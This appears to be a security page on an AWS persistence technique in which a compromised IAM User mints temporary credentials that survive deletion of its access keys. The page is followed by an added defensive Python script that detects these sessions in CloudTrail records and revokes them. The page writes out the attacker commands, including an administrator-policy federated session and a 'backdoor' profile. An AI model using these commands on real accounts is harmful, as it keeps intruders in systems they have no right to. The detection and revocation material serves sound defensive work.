Generating Temporary AWS Credentials from IAM User

AWS persistence technique

Overview

This is an interesting access vector that threat actors are using to avoid detection and maintain persistence. By generating temporary credentials (this can be done multiple times to keep backups), threat actors can maintain persistence in a target's AWS account.

  • The temporary credentials remain active even after the original compromised IAM User has had their access keys deactivated or deleted

  • The temporary credentials have whatever permissions the compromised IAM User has at the time of each request, so adding or removing permissions on the user also changes the temporary credentials' permissions

  • Neither of these options works with IAM Roles


sts:GetFederationToken


The following command allows you to generate temporary (15 min - 36 hours) credentials from an IAM User.

  • You can specify any name you want — it doesn't need to be a real user

  • You can specify any policy you want (up to 10 managed and/or inline policies), but the resulting credentials only have the permissions of the user running this command, even if you pass it an administrator policy

aws sts get-federation-token --name sally --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess --duration-seconds 129600

{
    "Credentials": {
        "AccessKeyId": "ASIA[REDACTED]",
        "SecretAccessKey": "pZlpr[REDACTED]",
        "SessionToken": "IQoJb3J[REDACTED]",
        "Expiration": "2025-11-11T08:56:15+00:00"
    },
    "FederatedUser": {
        "FederatedUserId": "111111111111:sally",
        "Arn": "arn:aws:sts::111111111111:federated-user/sally"
    },
    "PackedPolicySize": 7
}

  • The credentials can be configured with aws --profile sally configure


sts:GetSessionToken


The following command allows you to generate temporary (15 min - 36 hours) credentials from an IAM User.

  • The credentials can be configured with aws --profile tyler-backdoor configure
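As an added defender-side example that is not part of the original page, the Python script below triages CloudTrail-style records for the two APIs described in this page, sts:GetFederationToken and sts:GetSessionToken. It reports every call that minted temporary credentials from an IAM User, lists the sessions that outlive the deletion or deactivation of the issuing access key (the first bullet in the overview), surfaces activity performed under federated-user ARNs, and builds the inline deny policy that uses the aws:TokenIssueTime condition key to cut those sessions off before they expire, which works because the credentials carry the user's current permissions. The event records, timestamps, user names and key ids are constructed for the example; real CloudTrail records carry more fields and format the responseElements expiration differently, so the timestamp parser would need adjusting. Attaching the deny policy to an IAM User is my adaptation of the approach AWS documents for revoking role sessions.

```python
import json
from datetime import datetime, timezone

# Constructed sample CloudTrail records (not real events), trimmed to the
# fields this script reads. Timestamps are ISO 8601 with a trailing Z.
SAMPLE_EVENTS = [
    {   # attacker mints a 36h federated session from a stolen IAM User key
        "eventTime": "2025-11-09T20:56:15Z",
        "eventSource": "sts.amazonaws.com", "eventName": "GetFederationToken",
        "userIdentity": {"type": "IAMUser", "userName": "compromised-user",
                         "accessKeyId": "AKIAEXAMPLE000000001"},
        "requestParameters": {"name": "sally", "durationSeconds": 129600,
                              "policyArns": [{"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}]},
        "responseElements": {"credentials": {"accessKeyId": "ASIAEXAMPLE000000001",
                                             "expiration": "2025-11-11T08:56:15Z"}},
    },
    {   # and a second backup session via GetSessionToken
        "eventTime": "2025-11-09T21:02:40Z",
        "eventSource": "sts.amazonaws.com", "eventName": "GetSessionToken",
        "userIdentity": {"type": "IAMUser", "userName": "compromised-user",
                         "accessKeyId": "AKIAEXAMPLE000000001"},
        "requestParameters": {"durationSeconds": 129600},
        "responseElements": {"credentials": {"accessKeyId": "ASIAEXAMPLE000000002",
                                             "expiration": "2025-11-11T09:02:40Z"}},
    },
    {   # responder deletes the long-lived key the next morning ...
        "eventTime": "2025-11-10T09:15:00Z",
        "eventSource": "iam.amazonaws.com", "eventName": "DeleteAccessKey",
        "userIdentity": {"type": "IAMUser", "userName": "admin"},
        "requestParameters": {"userName": "compromised-user",
                              "accessKeyId": "AKIAEXAMPLE000000001"},
    },
    {   # ... but the federated session is still used afterwards
        "eventTime": "2025-11-10T10:30:00Z",
        "eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
        "userIdentity": {"type": "FederatedUser",
                         "arn": "arn:aws:sts::111111111111:federated-user/sally",
                         "accessKeyId": "ASIAEXAMPLE000000001"},
    },
]

TEMP_CRED_APIS = {"GetFederationToken", "GetSessionToken"}


def _ts(s):
    """Parse the constructed ISO 8601 timestamps as aware UTC datetimes."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_issuance(events):
    """One finding per IAM User call that minted temporary credentials."""
    findings = []
    for e in events:
        if e.get("eventSource") != "sts.amazonaws.com" or e.get("eventName") not in TEMP_CRED_APIS:
            continue
        ident = e.get("userIdentity", {})
        if ident.get("type") != "IAMUser":  # these APIs only matter for IAM Users
            continue
        req = e.get("requestParameters", {})
        creds = e.get("responseElements", {}).get("credentials", {})
        findings.append({
            "api": e["eventName"], "issued_at": _ts(e["eventTime"]),
            "issuer": ident.get("userName"), "issuer_key": ident.get("accessKeyId"),
            "federated_name": req.get("name"), "duration_seconds": req.get("durationSeconds"),
            "temp_key": creds.get("accessKeyId"),
            "expires_at": _ts(creds["expiration"]) if "expiration" in creds else None,
        })
    return findings


def key_revocations(events):
    """Map long-lived access key id -> time it was deleted or set Inactive."""
    out = {}
    for e in events:
        p = e.get("requestParameters", {})
        if e.get("eventSource") != "iam.amazonaws.com":
            continue
        if e.get("eventName") == "DeleteAccessKey" or (
                e.get("eventName") == "UpdateAccessKey" and p.get("status") == "Inactive"):
            out[p.get("accessKeyId")] = _ts(e["eventTime"])
    return out


def surviving_sessions(events):
    """Temporary credentials minted by a revoked key that expire after the revocation."""
    revoked = key_revocations(events)
    return [f for f in find_issuance(events)
            if f["issuer_key"] in revoked and f["expires_at"] and f["expires_at"] > revoked[f["issuer_key"]]]


def federated_activity(events):
    """(time, principal ARN, action) for calls made with federated-user credentials."""
    return [(e["eventTime"], e["userIdentity"]["arn"], e["eventName"])
            for e in events if e.get("userIdentity", {}).get("type") == "FederatedUser"]


def revoke_sessions_policy(issued_before_iso):
    """Inline deny policy to attach to the IAM User: blocks any request whose
    credentials were issued before the given time (aws:TokenIssueTime)."""
    return json.dumps({"Version": "2012-10-17", "Statement": [{
        "Effect": "Deny", "Action": "*", "Resource": "*",
        "Condition": {"DateLessThan": {"aws:TokenIssueTime": issued_before_iso}}}]}, indent=2)


if __name__ == "__main__":
    for f in surviving_sessions(SAMPLE_EVENTS):
        print(f"{f['api']} by {f['issuer']}: temp key {f['temp_key']} valid until {f['expires_at']}")
    for when, arn, action in federated_activity(SAMPLE_EVENTS):
        print(f"{when} {arn} called {action}")
    print(revoke_sessions_policy("2025-11-10T09:15:00Z"))
```

The surviving-session check is the one that matters in response: deleting the compromised user's access key (the natural first step) does nothing to these sessions, so the output of surviving_sessions tells the responder which temporary keys still need to be cut off, and the generated policy does that for all sessions issued before the chosen time. Because the policy also denies any new session for that user, it is a containment step rather than a permanent fix.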
